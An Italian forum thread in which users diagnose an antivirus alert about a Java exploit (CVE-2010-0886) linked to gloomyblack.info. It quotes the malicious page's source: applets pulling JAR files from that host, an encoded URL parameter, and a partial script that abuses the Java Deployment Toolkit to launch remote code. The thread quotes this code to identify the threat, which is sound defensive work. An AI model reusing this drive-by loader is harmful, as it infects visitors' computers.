gloomyblack

[Cincelli]

CIao Ragazzi, da qualche giorni accedendo ad un sito da me gestito, il mio antivirus si attiva segnalando un virus legato alla pagina web:

rilevato: Trojan program Exploit.Java.CVE-2010-0886.a (modifica)
URL: http://gloomyblack.info:8080/Applet1.html

MAgari è legato a qualche script o applet che ho inserito....
COme individuarlo ed eliminarlo?
Grazie!

[Nobody33]

Buona sera

Se te lo segnala da qualche giorno , mentre non hai modificato la pagina, penso che si tratta di un virus. Conviene che fai una o + scansione con antivirus diversi scansione ...



p.s.: prima lo fai meglio è
p.s2: il link da te inserito porta ad una pagina bianca come la neve

[Cincelli]

non si riesce a trovare....

cmq l'ho visto anche qui http://safeweb.norton.com/report/sho...oomyblack.info

[Nobody33]

Buona sera

Se il tuo antivirus te lo segnala, non riesci a rimuoverlo (l'antivirus online)? prova a fare varie scansioni delle cartelle del sito stesso..Se non ce la fa ugualmente, prova questo:

1) Scaricati MALWAREBYTES Sul tuo pc, lo fai aggiornare.
2) Dopo ti scolleghi da internet e gli fai fare una scansione COMPLETA (devi mettere la spunta sulla seconda voce nella schermata iniziale del programma suddetto ) del sistema..
3) Quando ha finito e trova qualcosa , premi un pulsante in basso per eliminare tutto ciò che trova sul tuo pc e posti qui il log.

4) se è un sito di piccole dimensioni, scaricati tutto suo tuo pc e gli fai fare delle scansioni con il programma suddetto ..sempre con lo stesso metodo...

Se hai una copia del sito suo tuo pc (conviene sempre tenersela sul pc )ancora meglio; cancella il sito on-line e ricarica tutto...altrimenti pulisci il sito in locale e lo ricarichi

questo per rendere le cose complesse...

Se vuoi provare una cosa semplice vai su QUESTA PAGINA ed esegui una scansione. Resta invariato da punto 1 a punto 3

fa sapere



p.s.: comunque strano che l'antivirus che hai sul server non lo trova ...

[Habanero]

Questo codice è tuo?

codice:

<html>
	<head>
	<title>Bob's Homepage</title>
	</head>
	<body>
		<applet width='100%' height='100%' code='JavaFX' archive='Games.jar'>
			<param name='site' VALUE='Njg3NDc0NzAzQTJGMkY2NzZDNkY2RjZENzk2MjZDNjE2MzZCMkU2OTZFNjY2RjNBMzgzMDM4MzAyRjc3NjU2QzYzNkY2RDY1MkU3MDY4NzAzRjY5NjQzRDMxMzEyNjcwNjk2NDNEMzEyNjYx'>
	 </applet>
	<applet code='quote.GReader.class' archive='NewGames.jar' width='288' height='175'>
				<param name='data' VALUE='http://gloomyblack.info:8080/welcome.php?id=9&pid=1&1=1'>
				<param name='cc' value='1'>
			</applet>
				<script>
        var u = "http: ......";

        if (window.navigator.appName == "Microsoft Internet Explorer") {
            var o = document.createElement("OBJECT");
            o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
            o.launch(u);
        } else {
            var o = document.createElement("OBJECT");
            var n = document.createElement("OBJECT");

            o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
            n.type = "application/java-deployment-toolkit";
            document.body.appendChild(o);
            document.body.appendChild(n);

            try {
                o.launch(u);
            } catch (e) {
                n.launch(u);

Se è tuo considera che il Java Deployment Toolkit è soggetto ad una grave vulnerabilità:
http://www.kb.cert.org/vuls/id/886582

Se non è tuo cancella immediatamente la pagina Applet1.html.

[Nobody33]

@habanero

appena tento di accedere al messaggio "gloomyblack" l'antivirus me lo blocca e mi rivela una minaccia . Antivirus : AVG... causa del blocco: JSE webstart - code 1066
soluzioni??

[Cincelli]

il codice non è mio, perchè non si trova sul mio server
quindi non posso cancellarla quella pagina

comunque ho risolto: era richiamata da un messaggio di posta memorizzato sul mio server...
grazie!

[Nobody33]

ho visto la pagina con avg disattivato e ho capito il perché...

...vuol dire che il resident shield ogni tanto fa il suo lavoro...

[Habanero]

Originariamente inviato da Cincelli
il codice non è mio, perchè non si trova sul mio server
quindi non posso cancellarla quella pagina

comunque ho risolto: era richiamata da un messaggio di posta memorizzato sul mio server...
grazie!

allora non avevo capito.. pensavo che con la frase 'accedendo ad un sito da me gestito' intendessi che proprio quello fosse un sito tuo...

[Habanero]

Originariamente inviato da Nobody33
ho visto la pagina con avg disattivato e ho capito il perché...

...vuol dire che il resident shield ogni tanto fa il suo lavoro...

:-D

[ho unito le discussioni... suppongo sia stato un errore]